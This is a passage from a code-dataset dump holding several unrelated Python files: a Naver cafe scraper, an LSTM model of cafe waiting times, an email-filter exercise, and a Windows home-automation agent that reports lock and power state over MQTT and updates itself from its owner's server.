max_page_num=100):\n # target_date = '20.01.03'\n target_date = startdate.strftime(\"%y.%m.%d\")\n logger.info('target_date: %s' % target_date)\n base_url = 'https://m.cafe.naver.com/ca-fe/web/cafes/29798500/menus/29'\n\n driver.get(base_url)\n # driver.switch_to_frame('cafe_main')\n for page_num in range(1, max_page_num):\n # 더보기 버튼 50번 클릭\n # driver.find_element_by_xpath('//*[@id=\"btnNextList\"]/a').click()\n driver.find_element_by_css_selector('.u_cbox_btn_more').click()\n # 로딩 시간이 있으므로 타이밍 맞추기 위해 sleep(0.5)\n time.sleep(0.5)\n article_list = driver.find_elements_by_class_name('board_box ')\n article_item = article_list[-1]\n tag_list = article_item.find_elements_by_tag_name('a')\n article_item_tag1 = tag_list[0] # 타이틀 바\n user_area = article_item_tag1.find_element_by_class_name('user_area')\n time_text = user_area.find_element_by_class_name('time').text\n if time_text < target_date and len(time_text) > 6:\n break\n\n # href 속성을 찾아 url을 리스트로 저장\n article_list = driver.find_elements_by_class_name('board_box ')\n article_urls = 
list()\n\n for i in range(len(article_list)):\n article_item = article_list[i]\n tag_list = article_item.find_elements_by_tag_name('a')\n article_item_tag1 = tag_list[0] # 타이틀 바\n href_url = article_item_tag1.get_attribute('href')\n article_item_tag_title = article_item_tag1.find_element_by_class_name('tit')\n title_text = article_item_tag_title.text\n user_area = article_item_tag1.find_element_by_class_name('user_area')\n nick_text = user_area.find_element_by_class_name('nick').text\n time_text = user_area.find_element_by_class_name('time').text\n no_text = user_area.find_element_by_class_name('no').text\n\n article_item_tag2 = tag_list[-1] # 댓글 카운\n reply_num_text = article_item_tag2.find_element_by_class_name('num').text # 댓글\n\n date_list = pd.date_range(startdate, enddate)\n target_date_list = [target_date.strftime('%y.%m.%d') for target_date in date_list]\n if time_text[:-1] in target_date_list:\n article_urls.append(href_url)\n logger.info(\"=======\" * 10)\n logger.info(title_text)\n logger.info(href_url)\n logger.info(\"%s %s %s reply: %s\" % (nick_text, time_text, no_text, reply_num_text))\n\n logger.info(\"=======\" * 10)\n logger.info(\"article_urls num: %d\" % len(article_urls))\n\n return article_urls\n\n\ndef scraping_article_content(driver, article_urls, startdate, enddate):\n res_list = list()\n for article_url in article_urls:\n article_id = article_url[67:72]\n # article_url = 'https://m.cafe.naver.com/ca-fe/web/cafes/29798500/articles/%s?fromList=true&menuId=29' % article_id\n driver.get(article_url)\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n # 게시글에서 제목 추출\n title = soup.select('h2.tit')[0].get_text()\n while title == 'undefined\\n ':\n driver.get(article_url)\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n # 게시글에서 제목 추출\n title = soup.select('h2.tit')[0].get_text()\n time.sleep(0.5)\n\n author = soup.find_all('a', {\"class\": \"nick\"})[1].text\n view_num = soup.find('span', {'class': 'no font_l'}).text\n view_num = view_num[3:].replace(',', '')\n view_num = int(view_num)\n\n # 내용을 하나의 텍스트로 만든다. 
(띄어쓰기 단위)\n content = soup.select('#postContent')[0].text\n content = content.replace('\\xa0', '\\n')\n content = content.replace('투표는 표시되지 않습니다', '')\n # dict 형태로만들어 결과 list 에 저장\n res_list.append({'title': title, 'author': author, 'view_num': view_num, 'content': content})\n logger.info(\"%s: %s, %s\" %(article_id, author, title.replace('\\n', '')))\n # time.sleep(1)\n\n startdate = startdate.strftime(\"%Y%m%d\")\n enddate = enddate.strftime(\"%Y%m%d\")\n df = pd.DataFrame(res_list)\n if startdate == enddate:\n df.to_csv('result_%s.csv' % enddate, sep='\\t', index=False)\n else:\n df.to_csv('result_%s_%s.csv' % (startdate, enddate), sep='\\t', index=False)\n\n\ndef main():\n import argparse\n\n strdate = now_dt.strftime(\"%Y%m%d\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument('startdate',\n type=lambda s: dt.datetime.strptime(s, \"%Y%m%d\").strftime(\"%Y%m%d\"),\n default=strdate,\n help=\"Start Date\",\n nargs='?'\n )\n parser.add_argument('enddate',\n type=lambda s: dt.datetime.strptime(s, \"%Y%m%d\").strftime(\"%Y%m%d\"),\n default='19000101',\n help=\"End Date\",\n nargs='?'\n )\n parser.add_argument('max_page_num',\n type=int,\n default=100,\n help=\"Max board page num\",\n nargs='?'\n )\n\n parser.add_argument(\"--auto\", help=\"auto naver login\", action=\"store_true\")\n\n args = parser.parse_args()\n\n if args.enddate > strdate:\n logger.warning(\"End Date over Today\")\n return\n elif args.startdate > strdate:\n logger.warning(\"Start Date over Today\")\n return\n elif args.enddate < args.startdate and args.enddate != '19000101':\n logger.warning(\"Start Date over End Date\")\n return\n if args.enddate == '19000101' and args.startdate <= strdate:\n args.enddate = args.startdate\n\n logger.info(\"Start Date: %s\" % args.startdate)\n logger.info(\"End Date: %s\" % args.enddate)\n logger.info(\"Max Page Num: %d\" % args.max_page_num)\n startdate = dt.datetime.strptime(args.startdate, \"%Y%m%d\")\n enddate = dt.datetime.strptime(args.enddate, \"%Y%m%d\")\n\n if not args.auto:\n naver_id = input('naver id: ')\n naver_pw = getpass.getpass('Enter pw:')\n else:\n with open(\".config\", \"r\") as f:\n auto_config = json.load(f)\n naver_id = auto_config['id']\n naver_pw = auto_config['pw']\n\n driver = selenium_naver_login(naver_id, naver_pw)\n article_urls = scraping_board_list(driver, startdate, enddate, args.max_page_num)\n scraping_article_content(driver, article_urls, startdate, enddate)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"QuantTraderEd/ficc_report_scrapping","sub_path":"scraping_main_old.py","file_name":"scraping_main_old.py","file_ext":"py","file_size_in_byte":8736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20080119638","text":"import pandas as pd\nimport nltk\nimport numpy as np\nimport tensorflow.keras as keras\nfrom sklearn import preprocessing, model_selection\nimport matplotlib.pyplot as plt\n\n\ndef get_xy():\n # cafe = pd.read_csv('data/cafe.csv', index_col=0)\n # print(cafe) # [500 rows x 13 columns]\n # print(cafe.values.shape) # (500, 13)\n\n\n # values = [cafe['아메리카노 수'], cafe['핫커피 수'], cafe['아이스커피 수'], cafe['핫음료 수'],\n # cafe['아이스음료 수'], cafe['블랜딩음료 수'], cafe['티 수'], cafe['펄 수'], cafe['총 잔 수'],\n # cafe['근무자 수'], cafe['밀린 주문 수'], cafe['대기시간 (+밀린 주문 수)']]\n cafe = pd.read_csv('data/cafe.csv')\n cafe = cafe.iloc[:, [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13]]\n print(cafe)\n\n values = np.transpose(cafe.values)\n print(values.shape) # (500, 12)\n\n scaler = 
preprocessing.MinMaxScaler() # 최소, 최대 범위를 0~1로\n values = scaler.fit_transform(cafe.values)\n\n grams = nltk.ngrams(values, 5+1)\n grams = np.float32(list(grams)) # 튜플의 리스트라 원하는 연산을 못함. 넘파이로 바꿔줌\n\n x = np.float32([g[:-1] for g in grams])\n # print(x.shape) # (493, 7, 13)\n y = np.float32([g[-1, -1:] for g in grams])\n # print(y.shape) # (493, 1)\n\n return x, y, scaler.data_min_[-1], scaler.data_max_[-1]\n\n\ndef model_cafe():\n x, y, data_min, data_max = get_xy() # 최대 최소값을 이용, 계산해 원래의 값으로 복구시킨다\n\n data = model_selection.train_test_split(x, y, train_size=0.8, shuffle=False)\n x_train, x_test, y_train, y_test = data\n\n model = keras.Sequential()\n model.add(keras.layers.InputLayer(input_shape=x.shape[1:]))\n model.add(keras.layers.LSTM(32, return_sequences=True, activation=\"ReLU\"))\n model.add(keras.layers.LSTM(16, return_sequences=True, activation=\"ReLU\"))\n model.add(keras.layers.LSTM(8, return_sequences=False, activation=\"ReLU\"))\n model.add(keras.layers.Dense(1))\n model.summary()\n\n model.compile(optimizer=keras.optimizers.Adam(0.01),\n loss=keras.losses.mse,\n metrics='mse')\n\n model.fit(x_train, y_train, epochs=100, verbose=2, batch_size=32)\n model.evaluate(x_test, y_test, verbose=2)\n print(model.evaluate(x_test, y_test, verbose=0))\n\n t = [[[1, 0, 0, 0, 0, 0, 1, 0, 2, 2, 1, 6.1],\n [0, 0, 0, 2, 1, 2, 0, 0, 5, 2, 1, 11.6],\n [0, 1, 0, 0, 1, 0, 0, 0, 2, 2, 2, 14.5],\n [0, 0, 0, 0, 0, 0, 3, 0, 3, 2, 2, 15.1],\n [2, 0, 1, 0, 0, 0, 0, 0, 3, 2, 3, 19.3]],\n [[1, 0, 0, 0, 0, 0, 1, 0, 2, 2, 1, 6.1],\n [0, 0, 0, 2, 1, 2, 0, 0, 5, 2, 1, 11.6],\n [0, 1, 0, 0, 1, 0, 0, 0, 2, 2, 2, 14.5],\n [0, 0, 0, 0, 0, 0, 3, 0, 3, 2, 2, 15.1],\n [2, 0, 1, 0, 0, 0, 0, 0, 3, 2, 3, 19.3]]]\n\n # line3-7\n p = model.predict(t)\n p = (data_max - data_min) * p + data_min\n print(p)\n\n exit()\n\n plt.subplot(1, 2, 1)\n plt.plot(y_test, 'r', label='target')\n plt.plot(p, 'g', label='prediction')\n plt.legend()\n\n p = (data_max - data_min) * p + data_min\n y_test = (data_max - data_min) * y_test + data_min\n\n plt.subplot(1, 2, 2)\n plt.plot(y_test, 'r')\n plt.plot(p, 'g')\n plt.show()\n\n\nmodel_cafe()\n\n\n\n","repo_name":"hmson18/cafe_WatingTime","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24636274926","text":"log = {}\nwhile True:\n name = input()\n if name == 'stop':\n break\n mail = input()\n x = mail[-2:].lower()\n if not x == 'us' and not x == 'uk':\n log[name] = mail\n[print(f'{i} -> {j}') for i, j in log.items()]\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Fundamentals/Dictionary/Old_Exercises/Fix_Emails.py","file_name":"Fix_Emails.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"38685136114","text":"from __future__ import print_function\r\n\r\nimport os, sys\r\n\r\nfrom win32con import *\r\nfrom win32gui import *\r\n\r\nimport win32service\r\nimport win32serviceutil\r\nimport servicemanager\r\nimport win32event\r\nimport win32service\r\n\r\nimport subprocess\r\n\r\nimport time\r\nimport json\r\nimport win32con\r\nimport win32com.client\r\nimport win32com.server.policy\r\nimport win32api\r\nimport win32ts\r\nimport win32process\r\nimport win32security\r\nimport win32profile\r\nimport wmi\r\nimport win32pdh\r\n\r\nimport random\r\n\r\nimport uuid\r\nimport re\r\nimport subprocess\r\n\r\nimport urllib.request\r\nfrom shutil 
import copyfile\r\nimport pythoncom\r\nimport logging\r\nimport sys\r\nimport ctypes\r\nimport asyncio\r\nimport keyboard\r\nimport datetime\r\nimport gmqtt\r\nimport socket\r\nfrom gmqtt import Client as MQTTClient\r\n\r\nSofaAgentVersion = 101018025\r\n\r\n\r\n## from Sens.h\r\nSENSGUID_PUBLISHER = \"{5fee1bd6-5b9b-11d1-8dd2-00aa004abd5e}\"\r\nSENSGUID_EVENTCLASS_LOGON = \"{d5978630-5b9f-11d1-8dd2-00aa004abd5e}\"\r\n\r\n## from EventSys.h\r\nPROGID_EventSystem = \"EventSystem.EventSystem\"\r\nPROGID_EventSubscription = \"EventSystem.EventSubscription\"\r\n\r\nIID_ISensLogon = \"{d597bab3-5b9f-11d1-8dd2-00aa004abd5e}\"\r\n\r\nclass SensLogon(win32com.server.policy.DesignatedWrapPolicy):\r\n _com_interfaces_=[IID_ISensLogon]\r\n _public_methods_=[\r\n 'Logon',\r\n 'Logoff',\r\n 'StartShell',\r\n 'DisplayLock',\r\n 'DisplayUnlock',\r\n 'StartScreenSaver',\r\n 'StopScreenSaver'\r\n ]\r\n\r\n def __init__(self, app):\r\n self.app=app\r\n self._wrap_(self)\r\n\r\n def Logon(self, *args):\r\n self.app.log.info('.. Log on event')\r\n asyncio.ensure_future(self.app.updateState('lockState','UNLOCKED'))\r\n\r\n def Logoff(self, *args):\r\n self.app.log.info('.. Log off event')\r\n asyncio.ensure_future(self.app.updateState('lockState','LOCKED'))\r\n\r\n def StartShell(self, *args):\r\n self.app.log.info('.. Start Shell event')\r\n\r\n def DisplayLock(self, *args):\r\n self.app.log.info('.. Display Lock event')\r\n asyncio.ensure_future(self.app.updateState('lockState','LOCKED'))\r\n\r\n def DisplayUnlock(self, *args):\r\n self.app.log.info('.. Display unlock event')\r\n asyncio.ensure_future(self.app.updateState('lockState','UNLOCKED'))\r\n\r\n def StartScreenSaver(self, *args):\r\n self.app.log.info('.. Start Screensaver event')\r\n\r\n def StopScreenSaver(self, *args):\r\n self.app.log.info('.. Stop Screensaver event')\r\n\r\nclass gmqttClient():\r\n\r\n def __init__(self, app):\r\n self.app=app\r\n #self.endpointId=self.app.devicePath.replace('/',':')\r\n self.deviceId=self.app.deviceId\r\n self.connected=False\r\n self.log = logging.getLogger('sofamqtt')\r\n self.log.info('.. 
MQTT Module initialized')\r\n self.topic='sofa/pc'\r\n self.broker='mqtt://home.dayton.home'\r\n self.broker='home.dayton.home'\r\n self.connected=False\r\n\r\n async def start(self):\r\n self.client = MQTTClient(self.deviceId)\r\n self.client.on_message = self.on_message\r\n self.client.on_connect = self.on_connect\r\n #self.client.set_auth_credentials(token, None)\r\n await self.client.connect(self.broker, 1883, version=gmqtt.constants.MQTTv311)\r\n \r\n def on_connect(self, client, flags, rc, properties):\r\n self.connected=True\r\n client.subscribe(self.topic, qos=0)\r\n self.sendState()\r\n\r\n def sendCommand(self,command):\r\n try:\r\n self.log.info('Sending command: %s' % command)\r\n self.client.publish(self.topic, json.dumps({'op':'command', 'device':self.app.deviceId, 'command':command }))\r\n except:\r\n self.log.error('Error sending command', exc_info=True)\r\n\r\n\r\n def sendState(self):\r\n try:\r\n self.client.publish(self.topic, json.dumps({'op':'state', 'device':self.app.deviceId, 'state': self.app.state }))\r\n except:\r\n self.log.error('Error sending state info', exc_info=True)\r\n\r\n def on_message(self, client, topic, payload, qos, properties):\r\n self.log.info('<< %s' % payload.decode())\r\n try:\r\n event=json.loads(payload)\r\n except:\r\n self.log.info('Message received but not JSON: %s' % payload)\r\n return False\r\n \r\n try:\r\n if 'op' in event:\r\n print('OP: %s' % event['op'])\r\n if event['op']=='discover':\r\n self.sendState()\r\n \r\n elif event['op']=='set':\r\n if event['device']==self.deviceId:\r\n asyncio.ensure_future(self.app.setState(event['property'], event['value']))\r\n\r\n except:\r\n self.log.error('Error handling message event: %s' % event, exc_info=True)\r\n\r\n\r\n async def notify(self, message, topic='pc'):\r\n\r\n try:\r\n if self.connected:\r\n self.log.info(\">> mqtt/%s %s\" % (self.topic, message))\r\n self.client.publish(self.topic, message)\r\n else:\r\n self.log.info('Notify called before connect')\r\n\r\n except:\r\n self.log.error('Error publishing message', exc_info=True)\r\n\r\n\r\nclass syslaunch():\r\n\r\n def __init__(self, app):\r\n self.app=app\r\n self.log = logging.getLogger('sofasyslaunch')\r\n \r\n def lockPC(self):\r\n ctypes.windll.user32.LockWorkStation()\r\n \t\t \r\n def suspendPC(self):\r\n \r\n self.log.info(\"+++ Local: Suspending PC\")\r\n # Enable the SeShutdown privilege (which must be present in your\r\n # token in the first place)\r\n try:\r\n priv_flags = win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERY\r\n hToken = win32security.OpenProcessToken (win32api.GetCurrentProcess (), priv_flags)\r\n priv_id = win32security.LookupPrivilegeValue (\r\n None, \r\n win32security.SE_SHUTDOWN_NAME\r\n )\r\n old_privs = win32security.AdjustTokenPrivileges (\r\n hToken,\r\n 0,\r\n [(priv_id, win32security.SE_PRIVILEGE_ENABLED)]\r\n )\r\n # Params:\r\n # True=> Standby; False=> Hibernate\r\n # True=> Force closedown; False=> Don't force\r\n ctypes.windll.kernel32.SetSystemPowerState (True, True)\r\n \r\n except: # catch *all* exceptions\r\n e = sys.exc_info()[1]\r\n self.log.info(\"Error: %s\" % e )\r\n\r\n\r\n\r\nclass sofaPCAgent():\r\n \r\n def __init__(self, isrunning=False):\r\n\r\n self.isrunning=isrunning\r\n self.deviceId=socket.gethostname()\r\n self.filepath=\"C:\\\\Program Files\\\\SofaAgent\"\r\n self.updatePollTime=6000\r\n self.lastUpdateCheck=datetime.datetime.now()\r\n\r\n pythoncom.CoInitialize()\r\n self.loop = asyncio.get_event_loop()\r\n self.adaptername='sofapc'\r\n 
self.logsetup('INFO',errorOnly=['gmqtt.mqtt.protocol','gmqtt.mqtt.handler','gmqtt.mqtt.package'])\r\n\r\n self.launch=syslaunch(self)\r\n self.mqttclient = gmqttClient(self)\r\n self.notify=self.mqttclient.notify\r\n #self.sendChangeReport=self.mqttclient.sendChangeReport\r\n self.log.info('-----------------')\r\n\r\n def logsetup(self, level=\"INFO\", errorOnly=[]):\r\n \r\n loglevel=getattr(logging,level)\r\n logging.basicConfig(level=loglevel, format='%(asctime)-6s.%(msecs).03d %(levelname).1s %(lineno)4d %(threadName)-.1s: %(message)s',datefmt='%m/%d %H:%M:%S', filename='c:\\\\programdata\\\\%s.log' % self.adaptername,)\r\n self.log = logging.getLogger(self.adaptername)\r\n \r\n formatter = logging.Formatter('%(asctime)-6s.%(msecs).03d %(levelname).1s %(lineno)4d %(threadName)-.1s: %(message)s',datefmt='%m/%d %H:%M:%S')\r\n console = logging.StreamHandler()\r\n console.setFormatter(formatter)\r\n console.setLevel(logging.INFO)\r\n\r\n self.log.info('-- -----------------------------------------------')\r\n\r\n logging.getLogger(self.adaptername).addHandler(console)\r\n \r\n for lg in logging.Logger.manager.loggerDict:\r\n #self.log.info('.. Active logger: %s' % lg)\r\n for item in errorOnly:\r\n if lg.startswith(item):\r\n self.log.info('.. Logger set to error and above: %s' % lg)\r\n logging.getLogger(lg).setLevel(logging.ERROR)\r\n\r\n\r\n def initPowerEventMonitor(self):\r\n wc = WNDCLASS()\r\n wc.hInstance = hInst = GetModuleHandle(None)\r\n wc.lpszClassName = \"PowerMonitor\"\r\n wc.lpfnWndProc = self.WndProc\r\n self.classAtom = RegisterClass(wc)\r\n self.hWnd = CreateWindow(self.classAtom, \"Power event monitor\", 0, 0, 0, CW_USEDEFAULT, CW_USEDEFAULT, 0, 0, hInst, None)\r\n UpdateWindow(self.hWnd) \r\n\r\n def requestLockState(self): \r\n hwinsta = win32service.OpenWindowStation(\"winsta0\", False, win32con.READ_CONTROL)\r\n hwinsta.SetProcessWindowStation()\r\n try:\r\n curr_desktop=win32service.OpenInputDesktop(0,True,win32con.MAXIMUM_ALLOWED)\r\n self.log.info('Requested Lock State: Unlocked')\r\n return 'UNLOCKED'\r\n\r\n except:\r\n self.log.info('Requested Lock State: Locked',exc_info=True)\r\n return 'LOCKED'\r\n\r\n def initSensEventMonitor(self):\r\n sl=SensLogon(self)\r\n subscription_interface=pythoncom.WrapObject(sl)\r\n event_system=win32com.client.Dispatch(PROGID_EventSystem)\r\n event_subscription=win32com.client.Dispatch(PROGID_EventSubscription)\r\n event_subscription.EventClassID=SENSGUID_EVENTCLASS_LOGON\r\n event_subscription.PublisherID=SENSGUID_PUBLISHER\r\n event_subscription.SubscriptionName='Python subscription'\r\n event_subscription.SubscriberInterface=subscription_interface\r\n event_system.Store(PROGID_EventSubscription, event_subscription)\r\n\r\n def initMediaKeys(self):\r\n keyboard.add_hotkey(-177, self.rewind, suppress=True) # unmute on keydown\r\n keyboard.add_hotkey(-176, self.ffw, suppress=True) # unmute on keydown\r\n keyboard.add_hotkey(-179, self.playpause, suppress=True) # unmute on keydown\r\n\r\n def playpause(self):\r\n self.log.info('loop %s' % self.loop)\r\n cmd=json.dumps({'op':'command', 'device':self.deviceId, 'command':'play' })\r\n asyncio.run_coroutine_threadsafe(self.notify(cmd), self.loop)\r\n\r\n def ffw(self):\r\n self.log.info('loop %s' % self.loop)\r\n cmd=json.dumps({'op':'command', 'device':self.deviceId, 'command':'skip' })\r\n asyncio.run_coroutine_threadsafe(self.notify(cmd), self.loop)\r\n\r\n def rewind(self):\r\n self.log.info('loop %s' % self.loop)\r\n cmd=json.dumps({'op':'command', 'device':self.deviceId, 
'command':'rewind' })\r\n asyncio.run_coroutine_threadsafe(self.notify(cmd), self.loop)\r\n\r\n async def mainloop(self):\r\n\r\n await self.forwardevent('info','powermonitor Main Loop started. Waiting for events.')\r\n while self.isrunning:\r\n pythoncom.PumpWaitingMessages()\r\n PumpWaitingMessages()\r\n await asyncio.sleep(.1)\r\n delta = datetime.datetime.now()-self.lastUpdateCheck\r\n if delta.seconds>self.updatePollTime:\r\n self.checkForUpdates()\r\n\r\n \r\n def checkForUpdates(self):\r\n try:\r\n self.log.info('Current Agent Version: %s' % SofaAgentVersion)\r\n except:\r\n self.log.error('Error showing version', exc_info=True)\r\n return False\r\n\r\n try:\r\n self.lastUpdateCheck=datetime.datetime.now()\r\n url = 'https://home.dayton.home/var/pc/agentversion'\r\n data = urllib.request.urlopen(url)\r\n versioninfo=data.read()\r\n serverversion=versioninfo.decode()\r\n self.log.info('Server Agent Version: %s' % serverversion)\r\n \r\n if str(SofaAgentVersion) != str(serverversion):\r\n try:\r\n self.log.info('Downloading version %s' % serverversion)\r\n url = 'https://home.dayton.home/var/pc/agent'\r\n urllib.request.urlretrieve(url, \"%s\\sofaagent.py.new\" % self.filepath)\r\n self.log.info('New version %s available as %s' % (serverversion,\"%s\\sofaagent.py.new\" % self.filepath))\r\n copyfile(\"%s\\sofaagent.py\" % self.filepath, \"%s\\sofaagent.py.old\" % self.filepath)\r\n copyfile(\"%s\\sofaagent.py.new\" % self.filepath, \"%s\\sofaagent.py\" % self.filepath)\r\n \r\n # attempt to restart service\r\n DETACHED_PROCESS = 0x00000008\r\n results = subprocess.Popen(['%s\\sofa-restart.bat' % self.filepath], close_fds=True, creationflags=DETACHED_PROCESS)\r\n\r\n except:\r\n self.log.error('Error updating to current version %s' % serverversion, exc_info=True)\r\n \r\n except:\r\n self.log.error('Error with Check for Update', exc_info=True)\r\n \r\n\r\n async def updateState(self, prop, value, sendChangeReport=True):\r\n \r\n try:\r\n self.log.info('updateState: %s %s' % (prop, value))\r\n self.log.info('curState: %s %s' % (sendChangeReport, self.state[prop]))\r\n if self.state[prop]!=value:\r\n self.state[prop]=value\r\n if sendChangeReport:\r\n minichange={'op':'change', 'device':self.deviceId, 'property':prop, 'value':value}\r\n self.log.info('sending change report: %s ' % minichange)\r\n await self.notify(json.dumps(minichange))\r\n except:\r\n self.log.error('Error updating state: %s %s' % (prop, value), exc_info=True)\r\n \r\n async def setState(self, prop, value):\r\n \r\n if prop=='powerState':\r\n if value==\"OFF\":\r\n await self.updateState('lockState','LOCKED')\r\n await self.updateState('powerState','OFF')\r\n time.sleep(.5)\r\n self.launch.suspendPC()\r\n \r\n elif prop=='lockState':\r\n if value==\"UNLOCKED\":\r\n self.log.info('PC Unlock not implemented yet')\r\n elif value==\"LOCKED\":\r\n await self.updateState('lockState','LOCKED')\r\n self.launch.lockPC()\r\n \r\n\r\n def start(self):\r\n self.checkForUpdates()\r\n self.initPowerEventMonitor()\r\n self.initSensEventMonitor()\r\n self.initMediaKeys()\r\n self.state={ 'powerState' : 'ON', 'lockState' : self.requestLockState() }\r\n asyncio.set_event_loop(self.loop)\r\n self.loop.run_until_complete(self.mqttclient.start())\r\n self.loop.run_until_complete(self.mainloop())\t\r\n\r\n async def forwardevent(self, eventType, event, data=''):\r\n self.log.info(\"%s - %s %s %s\" % (str(datetime.datetime.now()), eventType, event, data))\r\n\r\n def stop(self):\r\n self.log.info('Sofa Agent Service is being stopped')\r\n 
self.loop.stop()\r\n        self.loop.close()\r\n        PostQuitMessage(0)\r\n\r\n    def WndProc(self, hWnd, message, wParam, lParam):\r\n        if message == WM_POWERBROADCAST:\r\n            if wParam == PBT_APMSUSPEND:\r\n                self.OnSuspend(hWnd, message, wParam, lParam)\r\n            elif wParam == PBT_APMRESUMESUSPEND:\r\n                self.OnResume(hWnd, message, wParam, lParam)\r\n            elif wParam == PBT_APMRESUMEAUTOMATIC:\r\n                self.OnAutoResume(hWnd, message, wParam, lParam)\r\n            else:\r\n                self.log.info(\"WMPB:\"+str(wParam))\r\n\r\n        elif message == WM_TIMECHANGE:\r\n            asyncio.ensure_future(self.forwardevent(\"state\",\"System Time Change Detected\"))\r\n        elif message == WM_SETTINGCHANGE:\r\n            asyncio.ensure_future(self.forwardevent(\"state\",\"Setting Change\",str(wParam)+\" \"+str(lParam)))\r\n        elif message == WM_DEVICECHANGE:\r\n            asyncio.ensure_future(self.forwardevent(\"state\",\"Device Change\",str(wParam)+\" \"+str(lParam)))\r\n        elif message == WM_CLOSE:\r\n            asyncio.ensure_future(self.forwardevent(\"state\",\"WM_CLOSE\"))\r\n            DestroyWindow(hWnd)\r\n        elif message == WM_DESTROY:\r\n            asyncio.ensure_future(self.forwardevent(\"state\",\"WM_DESTROY\"))\r\n            PostQuitMessage(0)\r\n        elif message == WM_QUERYENDSESSION:\r\n            asyncio.ensure_future(self.forwardevent(\"state\",\"WM_QUERYENDSESSION\"))\r\n            return True\r\n        else:\r\n            self.log.info(\"APM.unknown: \"+str(message))\r\n\r\n    def OnSuspend(self, hWnd, message, wParam, lParam):\r\n        try:\r\n            asyncio.ensure_future(self.updateState('lockState','LOCKED'))\r\n            asyncio.ensure_future(self.updateState('powerState','OFF'))\r\n            time.sleep(.5)\r\n        except:\r\n            self.log.error('Error handling suspend action', exc_info=True)\r\n\r\n    def OnResume(self, hWnd, message, wParam, lParam):\r\n        try:\r\n            asyncio.ensure_future(self.forwardevent(\"state\",\"resume\"))\r\n            asyncio.ensure_future(self.updateState('lockState','LOCKED'))\r\n            asyncio.ensure_future(self.updateState('powerState','ON'))\r\n        except:\r\n            self.log.error('Error handling resume action', exc_info=True)\r\n\r\n    def OnAutoResume(self, hWnd, message, wParam, lParam):\r\n        try:\r\n            asyncio.ensure_future(self.forwardevent(\"state\",\"autoresume\"))\r\n            asyncio.ensure_future(self.updateState('lockState','LOCKED'))\r\n            asyncio.ensure_future(self.updateState('powerState','ON'))\r\n        except:\r\n            self.log.error('Error handling autoresume action', exc_info=True)\r\n\r\nclass SMWinservice(win32serviceutil.ServiceFramework):\r\n    '''Base class to create winservice in Python'''\r\n\r\n    _svc_name_ = 'pythonService'\r\n    _svc_display_name_ = 'Python Service'\r\n    _svc_description_ = 'Python Service Description'\r\n\r\n    @classmethod\r\n    def parse_command_line(cls):\r\n        '''\r\n        ClassMethod to parse the command line\r\n        '''\r\n        win32serviceutil.HandleCommandLine(cls)\r\n\r\n    def __init__(self, args):\r\n        '''\r\n        Constructor of the winservice\r\n        '''\r\n        win32serviceutil.ServiceFramework.__init__(self, args)\r\n        self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\r\n        socket.setdefaulttimeout(60)\r\n\r\n    def SvcStop(self):\r\n        '''\r\n        Called when the service is asked to stop\r\n        '''\r\n        self.stop()\r\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\r\n        win32event.SetEvent(self.hWaitStop)\r\n\r\n    def SvcDoRun(self):\r\n        '''\r\n        Called when the service is asked to start\r\n        '''\r\n        self.start()\r\n        servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,\r\n                              servicemanager.PYS_SERVICE_STARTED,\r\n                              (self._svc_name_, ''))\r\n        self.main()\r\n\r\n    def start(self):\r\n        '''\r\n        Override to add logic before the start\r\n        eg. 
\r\n def start(self):\r\n '''\r\n Override to add logic before the start\r\n eg. set the running condition\r\n '''\r\n pass\r\n\r\n def stop(self):\r\n '''\r\n Override to add logic before the stop\r\n eg. invalidating running condition\r\n '''\r\n pass\r\n\r\n def main(self):\r\n '''\r\n Main method, to be overridden with the service logic\r\n '''\r\n pass\r\n\r\nclass sofaAgentService(SMWinservice):\r\n\r\n _svc_name_ = \"SofaAgent\"\r\n _svc_display_name_ = \"Sofa Control Agent\"\r\n _svc_description_ = \"Sofa MQTT control agent\"\r\n\r\n def stop(self):\r\n self.isrunning = False\r\n self.agent.stop()\r\n\r\n def start(self):\r\n self.isrunning = True\r\n\r\n def main(self):\r\n self.agent=sofaPCAgent(self.isrunning)\r\n self.agent.start()\r\n\r\n# entry point of the module: copy and paste into the new module,\r\n# ensuring you are calling \"parse_command_line\" of the newly created class\r\nif __name__ == '__main__':\r\n #isrunning=True\r\n #agent=sofaPCAgent(isrunning)\r\n #agent.start()\r\n\r\n print(sys.argv)\r\n sofaAgentService.parse_command_line()\r\n\r\n","repo_name":"tagdara/sofa-adapter-pc","sub_path":"old/sofaagent.py","file_name":"sofaagent.py","file_ext":"py","file_size_in_byte":20122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"71731783849","text":"from sublime import Region\nfrom sublime import version\n\nfrom NeoVintageous.nv.jumplist import jumplist_update\nfrom NeoVintageous.nv.ui import ui_bell\nfrom NeoVintageous.nv.utils import next_non_blank\nfrom NeoVintageous.nv.utils import regions_transform_to_normal_mode\nfrom NeoVintageous.nv.utils import regions_transformer\nfrom NeoVintageous.nv.utils import resolve_visual_line_target\nfrom NeoVintageous.nv.utils import resolve_visual_target\nfrom NeoVintageous.nv.utils import set_selection\nfrom NeoVintageous.nv.utils import show_if_not_visible\nfrom NeoVintageous.nv.utils import wrapscan\nfrom NeoVintageous.nv.vi.text_objects import find_next_lone_bracket\nfrom NeoVintageous.nv.vi.text_objects import find_prev_lone_bracket\nfrom NeoVintageous.nv.vim import EOF\nfrom NeoVintageous.nv.vim import INTERNAL_NORMAL\nfrom NeoVintageous.nv.vim import NORMAL\nfrom NeoVintageous.nv.vim import VISUAL\nfrom NeoVintageous.nv.vim import VISUAL_LINE\nfrom NeoVintageous.nv.vim import enter_normal_mode\nfrom NeoVintageous.nv.vim 